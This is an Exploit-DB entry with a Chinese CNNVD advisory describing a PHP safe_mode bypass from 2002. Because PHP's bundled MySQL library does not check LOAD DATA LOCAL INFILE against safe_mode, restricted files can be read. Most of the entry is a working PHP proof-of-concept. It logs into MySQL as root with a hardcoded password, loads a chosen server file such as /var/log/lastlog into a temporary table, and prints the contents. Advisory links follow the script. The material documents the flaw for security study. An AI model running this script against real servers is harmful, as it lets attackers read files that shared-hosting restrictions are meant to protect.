https://www.exploit-db.com/exploits/21264
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-033

PHP是种Server端嵌入式脚本语言，适用于Windows、Linux和许多Unix变体。它常用于WEB开发，提供了非常灵活的配置。从PHP3.0开始支持安全模式。在该模式下，PHP脚本功能受到极大限制，只能通过一个封装函数访问本地文件系统。可以在配置中指定允许访问(读、写、执行)哪些文件，并由封装函数进行这项检查。但是PHP携带的MySQLLibrary实现”LOADDATALOCALINFILE”时没有使用封装函数，攻击者可以通过MySQL绕过安全模式的访问限制。攻击者可以上传一个PHP文件，这个PHP文件运行时会连接到一个MySQL数据库，然后调用”LOADDATALOCALINFILE”命令来获取PHP所在服务器上的某些文件内容，对于提供虚拟主机服务的大型ISP，该问题尤其严重。PostgreSQL和其它PHP数据库扩展很可能存在类似问题。只不过PHP缺省支持MySQL。

<?php
/* 
source: http://www.securityfocus.com/bid/4026/info

PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. 

In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/

/*
   PHP Safe Mode Problem

   This script will connect to a database server running locally or
otherwise,
   create a temporary table with one column, use the LOAD DATA statement
to
   read a (possibly binary) file, then reads it back to the client.

   Any type of file may pass through this 'proxy'. Although unrelated,
this
   may also be used to access files on the DB server (although they must
be
   world-readable or in MySQLd's basedir, according to docs).
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'test_database';

$filename = '/var/log/lastlog';     /* File to grab from [local] server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "n" .
      "REASON: " . mysql_error () . "n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}

来源:XF
名称:php-mysql-safemode-bypass(8105)
链接:http://www.iss.net/security_center/static/8105.php
来源:BUGTRAQ
名称:20020203PHPSafeModeFilesystemCircumventionProblem
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101286577109716&w;=2
来源:BID
名称:4026
链接:http://www.securityfocus.com/bid/4026
来源:NTBUGTRAQ
名称:20020206DW020203-PHPclarification
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=101303819613337&w;=2
来源:NTBUGTRAQ
名称:20020205Re:PHPSafeModeFilesystemCircumventionProblem
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=101303065423534&w;=2
来源:NTBUGTRAQ
名称:20020203PHPSafeModeFilesystemCircumventionProblem
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=101285016125377&w;=2
来源:BUGTRAQ
名称:20020206DW020203-PHPclarification
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101304702002321&w;=2